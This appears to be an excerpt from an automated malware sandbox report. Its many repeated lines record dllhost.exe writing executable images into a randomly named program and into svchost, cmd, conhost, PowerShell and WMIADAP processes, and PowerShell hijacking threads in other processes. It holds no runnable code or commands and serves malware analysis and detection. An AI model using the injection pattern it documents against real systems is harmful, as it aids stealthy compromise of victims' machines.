Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19193100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 176E8750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4056 base: 8B20000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 6720 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: D10000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
